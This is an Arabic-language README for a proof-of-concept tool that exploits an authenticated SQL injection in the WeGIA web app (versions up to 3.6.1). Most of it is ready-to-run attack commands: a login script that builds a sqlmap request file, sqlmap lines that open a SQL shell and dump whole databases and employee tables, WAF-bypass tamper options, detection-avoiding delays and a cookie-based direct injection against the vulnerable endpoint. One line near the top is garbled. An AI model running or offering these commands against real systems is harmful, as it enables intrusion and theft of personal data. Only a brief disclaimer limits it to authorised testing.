
هذا سكربت مساعد خفيف بلغة بايثون مصمم لأتمتة إنشاء ملفات PoC المتوافقة مع sqlmap لثغرة حقن SQL القائمة على الأخطاء والمصادقة في WeGIA (≤ 3.6.1)، والمعروفة باسم GHSA-xfmp-2hf9-gfjp.
حقن SQL قائم على الأخطاء ومصادق عليه في WeGIA ≤ 3.6.1
GHSA-xfmp-2hf9-gfjp | الإعلان الرسمي
المؤلف الأصلي / مبلّغ الـ PoC: ViniCastro2001 نُشر بواسطة GHSA: nilsonLazarin (مشرف المشروع)
يعمل هذا السكربت الخفيف بلغة Python على أتمتة ما يلي:
id_memorando=1*)--sql-shell)requests (معظم بيئات اختبار الاختراق تحتوي عليها بالفعل)git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC
# موصى به: موجه كلمة مرور تفاعلي
python CVE-2026-23723.py --url http://target.com -u admin
# توفير كلمة المرور مباشرة
python CVE-2026-23723.py --url http://target.com -u admin -p wegia
# ملف إخراج مخصص
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req
بعد التشغيل بنجاح، سيقوم السكربت بما يلي:
محاولة تسجيل الدخول إنشاء wegia_sqlmap.req (أو اسم الملف المخصص الخاص بك) عرض أوامر sqlmap الجاهزة للاستخدام
# 1. صدفة تفاعلية شبيهة بـ MySQL (الأكثر تفضيلاً)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb
# 2. عرض قاعدة البيانات الحالية وجميع قواعد البيانات
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch
# 3. سرد الجداول في قاعدة بيانات wegia
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch
# 4. تفريغ جدول محدد (مثال: funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch
# 5. تفريغ قاعدة بيانات wegia بالكامل (بحذر!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
خيارات sqlmap إضافية:
--proxy=http://127.0.0.1:8080 (عبر Burp/ZAP)
--tamper=space2comment,randomcase (تجاوز أساسي لـ WAF)
--delay=1 (إبطاء السرعة لتجنب الاكتشاف)
إذا فشل تسجيل الدخول التلقائي سجّل الدخول يدويًا عبر المتصفح ← انسخ رأس Cookie بالكامل ← شغّل sqlmap مباشرة:
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
--cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
--sql-shell --batch
إخلاء المسؤولية القانوني يُقدَّم هذا الـ PoC لأغراض تعليمية واختبار الاختراق المصرح به فقط. الاستخدام غير المصرح به ضد أي نظام غير قانوني ومحظور. لا يتحمل المؤلف والمساهمون أي مسؤولية عن سوء الاستخدام أو أي ضرر ناتج. المراجع
GHSA-xfmp-2hf9-gfjp CVE-2026-23723